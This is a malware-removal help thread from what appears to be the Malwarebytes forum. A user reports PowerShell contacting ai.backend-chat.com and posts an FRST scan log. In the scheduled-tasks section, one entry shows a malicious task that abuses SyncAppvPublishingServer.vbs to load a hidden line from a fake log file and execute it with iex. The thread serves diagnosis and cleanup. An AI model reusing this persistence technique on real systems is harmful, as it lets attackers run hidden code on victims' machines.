
Hello! New to the board here. I keep getting a popup from the Malwarebytes notification stating I have a riskware problem. Could anyone enlighten me on what's below? The domain name doesn't exist, the malicious website is my PowerShell... am I a victim of a cyber attack or what's going on here?


Please let me know! Thank you. 


-Log Details-
Protection Event Date: 10/6/21
Protection Event Time: 1:11 PM
Log File: 2b7dad48-26d9-11ec-87a2-bc5ff42b1b34.json


-System Information-
OS: Windows 10 (Build 19042.985)
CPU: x64
File System: NTFS
User: System

-Blocked Website Details-
Malicious Website: 1
, C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Blocked, -1, -1, 0.0.0, , 

-Website Data-
Category: RiskWare
Domain: ai.backend-chat.com
IP Address: 172.67.170.251
Port: 443
Type: Outbound
File: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

(end)


Hello colbski and welcome to Malwarebytes,

Disable smart screen ONLY if it interferes with software we may have to use:

https://support.microsoft.com/en-us/microsoft-edge/what-is-smartscreen-and-how-can-it-help-protect-me-1c9a874a-6826-be5e-45b1-67fa445a74c8

Please remember to re-enable it when we are finished....

Next,

Disable any Anti-virus software you have installed ONLY if it stops software we may use from working:

https://www.bleepingcomputer.com/forums/t/114351/how-to-temporarily-disable-your-anti-virus-firewall-and-anti-malware-programs/

Please remember to enable AV software when we are finished running scans....

Run the following scan, let's see if anything shows up:

Download Farbar Recovery Scan Tool and save it to your desktop.

Alternative download option: http://www.techspot.com/downloads/6731-farbar-recovery-scan-tool.html

Note: You need to run the version compatible with your system (32 bit or 64 bit). If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

If your security software alerts to FRST, either accept the alert or turn your security off to allow FRST to run. It is not malicious or infected in any way...

Be aware FRST must be run from an account with Administrator status... If English is not your primary language, right-click on FRST/FRST64 and rename it to FRSTEnglish/FRST64English.

  • Double-click to run it. When the tool opens click Yes to the disclaimer. (Windows 8/10 users will be prompted about Windows SmartScreen protection - click More information and Run.)
  • Make sure Addition.txt is checkmarked under "Optional scans"
  • Press Scan button to run the tool....
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The tool will also make a log named (Addition.txt) Please attach that log to your reply.


Thank you,

Kevin

  • AdvancedSetup changed the title to Riskware block ai.backend-chat

Thanks for the rapid response. Here you go. Still trying to find the Addition.txt file.


Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 06-10-2021
Ran by User (administrator) on DESKTOP-69OG4GS (06-10-2021 13:47:19)
Running from C:\Users\User\AppData\Local\Temp\scoped_dir5424_581234476
Loaded Profiles: User
Platform: Windows 10 Pro Version 20H2 19042.985 (X64) Language: English (United States)
Default browser: Opera
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Apple Inc.) C:\Program Files\WindowsApps\AppleInc.iTunes_12121.1.54014.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe
(Flexera Software LLC -> Flexera) C:\Program Files (x86)\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\User\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2109.6-0\MsMpEng.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(Opera Software AS -> Opera Software) C:\Program Files\Opera\79.0.4143.72\opera_crashreporter.exe
(Opera Software AS -> Opera Software) C:\Program Files\Opera\opera.exe <14>
(Piriform Software Ltd -> Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe <2>
(Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgc.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3086208 2021-06-22] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM-x32\...\Run: [Opera Browser Assistant] => C:\Program Files\Opera\assistant\browser_assistant.exe [4105424 2021-10-05] (Opera Software AS -> Opera Software)
HKU\S-1-5-21-1006842105-1920769258-2521470405-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [27775672 2020-05-01] (Piriform Software Ltd -> Piriform Software Ltd)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\94.0.4606.71\Installer\chrmstp.exe [2021-10-05] (Google LLC -> Google LLC)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {1C428E84-20DA-494F-B043-F1B80707E9D7} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [913448 2019-10-16] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {258116A2-BD82-4698-9403-CE25E42EAEF1} - System32\Tasks\Microsoft\Windows\NetService\Network\NetServices => C:\Windows\System32\SyncAppvPublishingServer.vbs [1720 2019-12-07] (Microsoft Windows -> ) -> "n; $a = Get-Content "C:\Users\User\AppData\Local\logs\system-logs.txt" | Select -Index 17033;iex $a;hackbacktrack XoBJLWeei4NqeQuFneR9fArkoDLpp4Tj+YZu2tRZg3I=
Task: {2C828134-FA7B-42D7-88F5-87C979A820A9} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [686384 2020-05-01] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {3DEFA8CB-B32C-4608-8BF5-372BA3757863} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [52104 2017-09-22] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {43AFAB59-CECD-4D83-8B39-9D52AC88640A} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-12-30] (Google LLC -> Google LLC)
Task: {443739FD-902C-4413-92E2-A2B9D521B3F8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2109.6-0\MpCmdRun.exe [884544 2021-10-06] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {488D1354-4F30-45B0-ACB5-D33F70DF31CA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2109.6-0\MpCmdRun.exe [884544 2021-10-06] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {6CFD9559-9B31-4D39-AEBB-C7B9114CCBF3} - System32\Tasks\Opera scheduled Autoupdate 1531693452 => C:\Program Files\Opera\launcher.exe [42731728 2021-09-28] (Opera Software AS -> Opera Software)
Task: {7ED8DFD7-FBC5-4275-9F54-21A74385AF37} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2109.6-0\MpCmdRun.exe [884544 2021-10-06] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {8BF3D2D1-C2A4-41E7-90F5-5ED824091E6F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-12-30] (Google LLC -> Google LLC)
Task: {91F1BE2B-4FD7-4CFD-8BFB-5FA1A7D50D68} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [23571128 2020-05-01] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {BDB9CF21-5F30-49E9-A130-ACA8FC245AEC} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1562376 2021-08-16] (Adobe Inc. -> Adobe Inc.)
Task: {C963BF0C-DAAA-4772-BB45-1E812E079F22} - System32\Tasks\Microsoft\Windows\termsrv\RemoteFX\RemoteFXvGPUDisableTask => C:\WINDOWS\System32\RemoteFXvGPUDisablement.exe
Task: {D20CFA1C-3164-4E60-AF37-ABFDFAE60CED} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [913448 2019-10-16] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {D405BA4A-2F53-48A0-ADC0-35AD9252F54C} - System32\Tasks\Microsoft\Windows\termsrv\RemoteFX\RemoteFXWarningTask => C:\WINDOWS\System32\RemoteFXvGPUDisablement.exe
Task: {DA484D77-30F9-4609-977D-6D03BBF981E6} - System32\Tasks\Opera scheduled assistant Autoupdate 1583006413 => C:\Program Files\Opera\launcher.exe [42731728 2021-09-28] (Opera Software AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Program Files\Opera\assistant" $(Arg0)
Task: {DE52A56D-09CB-4603-A5E8-7512DA4F6DB2} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2109.6-0\MpCmdRun.exe [884544 2021-10-06] (Microsoft Windows Publisher -> Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{3ace03f1-d928-4108-8ab2-5b15714db44e}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{c5774c7e-5898-47ee-97ea-2fbac7aff309}: [DhcpNameServer] 10.10.0.1

Edge: 
=======
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
Edge Profile: C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default [2021-10-04]

FireFox:
========
FF HKU\S-1-5-21-1006842105-1920769258-2521470405-1001\...\Firefox\Extensions: [acewebextension_unlisted@acestream.org] - C:\Users\User\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi
FF Extension: (Ace Script) - C:\Users\User\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi [2018-11-26]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2021-09-24] (Adobe Inc. -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1006842105-1920769258-2521470405-1001: @acestream.net/acestreamplugin,version=3.1.32 -> C:\Users\User\AppData\Roaming\ACEStream\player\npace_plugin.dll [2017-01-13] (Innovative Digital Technologies -> Innovative Digital Technologies)

Chrome: 
=======
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT [2021-10-04]
CHR Extension: (Docs) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\aohghmighlieiainnegkcijnfilokake [2018-07-15]
CHR Extension: (Google Drive) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-11-15]
CHR Extension: (Pop up blocker for Chrome™ - Poper Blocker) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\bkkbcggnhapdmkeljlodobbkopceiche [2021-09-19]
CHR Extension: (YouTube) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-07-15]
CHR Extension: (Adobe Acrobat) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2021-08-02]
CHR Extension: (FantasyPros: Win your Fantasy League) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\gfbepnlhpkbgbkcebjnfhgjckibfdfkc [2021-09-28]
CHR Extension: (Google Docs Offline) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-09-28]
CHR Extension: (Avast Online Security) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\gomekmidlodglbbmalcneegieacbdmki [2021-04-05]
CHR Extension: (Ace Script) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\mjbepbhonbojpoaenhckjocchgfiaofo [2018-12-29]
CHR Extension: (Chrome Web Store Payments) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-04-05]
CHR Extension: (Gmail) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-11-15]
CHR HKU\S-1-5-21-1006842105-1920769258-2521470405-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki]

Opera: 
=======
OPR Profile: C:\Users\User\AppData\Roaming\Opera Software\Opera Stable [2021-10-06]
OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=opera&q={searchTerms}&ie={inputEncoding}&oe={outputEncoding}
OPR Extension: (Rich Hints Agent) - C:\Users\User\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2021-09-29]
OPR Extension: (Popup Blocker (strict)) - C:\Users\User\AppData\Roaming\Opera Software\Opera Stable\Extensions\jabcemjkhjfpkhakphioakkhcnbgeomm [2021-09-19]
OPR Extension: (Amazon Assistant Promotion) - C:\Users\User\AppData\Roaming\Opera Software\Opera Stable\Extensions\kbmoiomgmchbpihhdpabemajcbjpcijk [2021-09-01]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169728 2021-08-16] (Adobe Inc. -> Adobe Inc.)
S3 FACEITService; C:\Program Files\FACEIT AC\FACEITService.exe [23341512 2021-10-06] (FACE IT LIMITED -> )
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5393288 2021-05-15] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10147296 2021-06-22] (Riot Games, Inc. -> Riot Games, Inc.)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2109.6-0\NisSrv.exe [2855512 2021-10-06] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2109.6-0\MsMpEng.exe [128392 2021-10-06] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R0 AsrRamDisk; C:\WINDOWS\System32\drivers\AsrRamDisk.sys [40200 2014-07-30] (ASROCK Incorporation -> ASRock Inc.)
R2 BdDci; C:\WINDOWS\system32\DRIVERS\bddci.sys [800672 2021-08-26] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
S3 bduefiscan; C:\WINDOWS\system32\DRIVERS\bduefiscan.sys [55864 2021-07-09] (Bitdefender SRL -> Bitdefender)
S3 edrsensor; C:\WINDOWS\System32\DRIVERS\edrsensor.sys [309120 2020-02-03] (Bitdefender SRL -> BitDefender S.R.L. Bucharest, ROMANIA)
R0 FACEIT; C:\WINDOWS\System32\Drivers\FACEIT.sys [12566520 2021-10-01] (Microsoft Windows Hardware Compatibility Publisher -> )
S3 logi_joy_bus_enum; C:\WINDOWS\system32\drivers\logi_joy_bus_enum.sys [32448 2020-09-19] (WDKTestCert sqa,131523902232810150 -> Logitech, Inc.)
S3 logi_joy_xlcore; C:\WINDOWS\system32\drivers\logi_joy_xlcore.sys [61288 2020-09-19] (WDKTestCert sqa,131523902232810150 -> Logitech, Inc.)
S3 RTCore64; C:\Program Files (x86)\MSI Afterburner\RTCore64.sys [14024 2017-08-27] (MICRO-STAR INTERNATIONAL CO., LTD. -> )
S3 RZSURROUNDVADService; C:\WINDOWS\system32\drivers\RzSurroundVAD.sys [49176 2016-10-16] (Razer USA Ltd. -> Windows (R) Win 7 DDK provider)
S3 sthid; C:\WINDOWS\System32\drivers\sthid.sys [21216 2017-11-01] (Splashtop Inc. -> Splashtop Inc.)
S3 tapprotonvpn; C:\WINDOWS\System32\drivers\tapprotonvpn.sys [49024 2021-05-28] (Microsoft Windows Hardware Compatibility Publisher -> The OpenVPN Project)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [8241992 2021-06-22] (Riot Games, Inc. -> Riot Games, Inc.)
R0 vlflt; C:\WINDOWS\System32\DRIVERS\vlflt.sys [481696 2021-09-01] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48520 2021-10-06] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [434424 2021-10-06] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [86264 2021-10-06] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-06 13:46 - 2021-10-06 13:47 - 000000000 ____D C:\FRST
2021-10-06 13:46 - 2021-10-06 13:46 - 002308096 _____ (Farbar) C:\Users\User\Desktop\FRST64.exe
2021-10-06 13:46 - 2021-10-06 13:46 - 002019328 _____ (Farbar) C:\Users\User\Desktop\FRST.exe
2021-10-06 13:45 - 2021-10-06 13:45 - 000000000 _____ C:\Users\User\Desktop\FRST.exe (1).opdownload
2021-10-06 13:43 - 2021-10-06 13:43 - 000000000 _____ C:\Users\User\Desktop\FRST.exe.opdownload
2021-10-06 11:51 - 2021-10-06 11:51 - 000072516 _____ C:\ProgramData\agent.uninstall.1633542670.bdinstall.v2.bin
2021-10-06 11:50 - 2021-10-06 11:50 - 002101944 _____ (Malwarebytes) C:\Users\User\Desktop\MBSetup-119967.119967-consumer.exe
2021-10-06 11:50 - 2021-10-06 11:50 - 000001196 _____ C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Bitdefender Antivirus Free.lnk
2021-10-06 11:49 - 2021-10-06 11:49 - 000000000 ____D C:\ProgramData\48C4687D-9760-4F5B-BAB3-60351B0841E4
2021-10-06 11:48 - 2021-10-06 11:48 - 000000000 ____D C:\ProgramData\Bitdefender
2021-10-06 11:48 - 2021-09-01 12:47 - 000481696 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\vlflt.sys
2021-10-06 11:48 - 2021-08-26 15:48 - 000800672 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\bddci.sys
2021-10-06 11:48 - 2021-08-23 06:04 - 001183128 _____ (BitDefender S.R.L. Bucharest, ROMANIA) C:\WINDOWS\system32\Drivers\gemma.sys
2021-10-06 11:48 - 2021-08-17 06:02 - 003707800 _____ (Bitdefender S.R.L. Bucharest, ROMANIA) C:\WINDOWS\system32\Drivers\atc.sys
2021-10-06 11:48 - 2021-07-21 16:24 - 000615328 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\trufos.sys
2021-10-06 11:48 - 2021-07-09 01:36 - 000055864 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\bduefiscan.sys
2021-10-06 11:48 - 2020-02-03 16:53 - 000309120 _____ (BitDefender S.R.L. Bucharest, ROMANIA) C:\WINDOWS\system32\Drivers\edrsensor.sys
2021-10-06 11:47 - 2021-10-06 13:26 - 000000000 ____D C:\Program Files\Bitdefender Antivirus Free
2021-10-06 11:47 - 2021-10-06 11:51 - 000000000 ____D C:\Program Files\Bitdefender Agent
2021-10-06 11:47 - 2021-10-06 11:47 - 000116464 _____ C:\ProgramData\agent.1633542438.bdinstall.v2.bin
2021-10-06 11:47 - 2021-10-06 11:47 - 000000000 ____D C:\ProgramData\Bitdefender Agent
2021-10-06 11:04 - 2021-10-06 11:04 - 000000000 ____D C:\Program Files\Malwarebytes
2021-10-06 10:57 - 2021-10-06 11:00 - 000000000 ____D C:\Users\User\Downloads\Like Moths To Flames - An Eye For An Eye (2013) M4a 320Kbps R3D SilverRG
2021-10-06 10:53 - 2021-10-06 10:54 - 000000000 ____D C:\Users\User\Downloads\Nitro Pro 13.49.2.993 Enterprise  Retail + crack {PROAC12}
2021-10-06 10:52 - 2021-10-06 10:52 - 000000000 ____D C:\Users\User\Downloads\Saosin - Along the Shadow (Deluxe) (2016) [MP3~320Kbps]~[Hunter] [FRG]
2021-10-06 09:59 - 2021-10-06 10:58 - 000000000 ____D C:\Users\User\AppData\Local\Downloaded Installations
2021-10-06 09:59 - 2021-10-06 09:59 - 000000000 ____D C:\ProgramData\Nitro
2021-10-06 09:59 - 2021-10-06 09:59 - 000000000 ____D C:\Program Files\Nitro
2021-10-06 09:57 - 2021-10-06 09:57 - 000000000 ____D C:\Users\User\AppData\Roaming\Nitro
2021-10-06 09:44 - 2021-10-06 11:47 - 000000000 ____D C:\Users\User\Desktop\newdot
2021-10-05 21:00 - 2021-10-05 21:00 - 000000000 ____D C:\Users\User\AppData\Local\D290DB.tmpd
2021-10-05 21:00 - 2021-10-05 21:00 - 000000000 _____ C:\Users\User\AppData\Local\D290DB.tmp
2021-10-05 13:24 - 2021-10-05 13:24 - 000418841 _____ C:\Users\User\Documents\HALLIBURTONESdot.pdf
2021-10-05 11:58 - 2021-10-05 11:58 - 000000000 ____D C:\Users\User\AppData\Local\D27C45.tmpd
2021-10-05 11:58 - 2021-10-05 11:58 - 000000000 _____ C:\Users\User\AppData\Local\D27C45.tmp
2021-10-05 08:28 - 2021-10-05 13:25 - 000000000 ____D C:\Users\User\Desktop\DOT
2021-10-05 08:22 - 2021-10-05 12:26 - 000411275 _____ C:\Users\User\Downloads\DOT FMCSA Release - 3 Year v5.08.23 _form (1).pdf
2021-10-05 08:21 - 2021-10-05 08:21 - 000387158 _____ C:\Users\User\Downloads\DOT FMCSA Release - 3 Year v5.08.23 _form.pdf
2021-10-04 19:10 - 2021-10-04 19:10 - 000000000 ____D C:\Users\User\AppData\Local\D243BC.tmpd
2021-10-04 19:10 - 2021-10-04 19:10 - 000000000 _____ C:\Users\User\AppData\Local\D243BC.tmp
2021-10-04 16:29 - 2021-10-04 16:29 - 000000000 ____D C:\Users\User\AppData\Local\D2EBB3.tmpd
2021-10-04 16:29 - 2021-10-04 16:29 - 000000000 _____ C:\Users\User\AppData\Local\D2EBB3.tmp
2021-10-04 15:30 - 2021-10-05 11:55 - 000000000 ____D C:\Users\User\AppData\Local\D2647.tmpd
2021-10-04 15:30 - 2021-10-05 11:55 - 000000000 ____D C:\Users\User\AppData\Local\D21F5E.tmpd
2021-10-04 15:30 - 2021-10-04 15:30 - 000000000 _____ C:\Users\User\AppData\Local\D2647.tmp
2021-10-04 15:30 - 2021-10-04 15:30 - 000000000 _____ C:\Users\User\AppData\Local\D21F5E.tmp
2021-10-04 15:25 - 2021-10-04 15:25 - 000001309 _____ C:\BnetLog.txt
2021-10-04 15:25 - 2021-10-04 15:25 - 000000000 ____D C:\Users\User\Documents\Diablo II
2021-10-04 15:24 - 2021-10-04 15:24 - 000001198 _____ C:\Users\Public\Desktop\Diablo II - Lord of Destruction.lnk
2021-10-04 15:24 - 2021-10-04 15:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Diablo II
2021-10-04 15:23 - 2021-10-05 21:00 - 000000000 ____D C:\Program Files (x86)\Diablo II
2021-09-24 16:09 - 2021-09-24 16:09 - 000065291 _____ C:\Users\User\Downloads\-5278170232392415309.PDF
2021-09-24 16:09 - 2021-09-24 16:09 - 000040063 _____ C:\Users\User\Downloads\-7957964943521938263.pdf
2021-09-24 15:51 - 2021-09-24 15:51 - 000087110 _____ C:\Users\User\Downloads\-5146372055576612323.PDF
2021-09-24 15:45 - 2021-09-24 15:45 - 000365632 _____ C:\Users\User\Downloads\-8713336288066998934.pdf
2021-09-24 15:13 - 2021-09-24 15:13 - 000010412 _____ C:\Users\User\Downloads\pay_statements.zip
2021-09-24 15:13 - 2021-09-24 15:13 - 000000000 ____D C:\Users\User\Desktop\2021 paystubs
2021-09-18 13:31 - 2021-09-18 13:31 - 000069683 _____ C:\Users\User\Desktop\Access Idaho Services driver record.pdf
2021-09-16 12:37 - 2021-09-24 20:36 - 000000802 _____ C:\Users\User\Desktop\republic services.txt
2021-09-16 12:35 - 2021-09-16 12:35 - 000001388 _____ C:\Users\User\Desktop\grasmick produce.txt

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-06 13:43 - 2019-12-07 03:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-10-06 13:43 - 2019-12-07 03:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-10-06 13:38 - 2019-12-07 03:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-10-06 13:37 - 2018-07-18 21:52 - 000000000 ____D C:\Users\User\AppData\Local\CrashDumps
2021-10-06 13:32 - 2021-05-15 10:44 - 000795738 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-10-06 13:32 - 2019-12-07 03:13 - 000000000 ____D C:\WINDOWS\INF
2021-10-06 13:31 - 2018-07-15 16:23 - 000000000 ____D C:\Program Files (x86)\Google
2021-10-06 13:30 - 2020-04-15 14:33 - 000000001 _____ C:\WINDOWS\vgkbootstatus.dat
2021-10-06 13:28 - 2021-05-15 10:49 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-10-06 13:28 - 2018-07-14 17:04 - 000000000 ____D C:\ProgramData\NVIDIA
2021-10-06 13:28 - 2018-07-06 19:04 - 000000000 __SHD C:\Users\User\IntelGraphicsProfiles
2021-10-06 13:27 - 2021-05-15 10:24 - 000008192 ___SH C:\DumpStack.log.tmp
2021-10-06 13:26 - 2019-12-07 03:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-10-06 13:26 - 2019-12-07 03:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2021-10-06 13:10 - 2018-09-09 09:03 - 000000000 ____D C:\Users\User\AppData\Roaming\FACEIT
2021-10-06 12:16 - 2018-07-06 19:46 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2021-10-06 12:14 - 2018-09-16 22:04 - 000000000 ____D C:\Program Files\FACEIT AC
2021-10-06 11:45 - 2019-12-07 03:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-10-06 11:13 - 2018-07-15 16:13 - 000000000 ____D C:\Program Files\Opera
2021-10-06 11:03 - 2019-02-02 14:10 - 000000000 ____D C:\Users\User\AppData\Roaming\uTorrent
2021-10-06 11:01 - 2020-04-05 13:43 - 000000000 ____D C:\Users\User\Desktop\Job stuff
2021-10-06 10:53 - 2019-04-20 16:16 - 000000000 ____D C:\Users\User\AppData\Local\BitTorrentHelper
2021-10-06 10:53 - 2018-07-01 16:29 - 000000000 ____D C:\ProgramData\Package Cache
2021-10-05 22:59 - 2018-07-15 15:55 - 000000000 ____D C:\Program Files (x86)\Steam
2021-10-05 20:10 - 2018-07-15 16:26 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
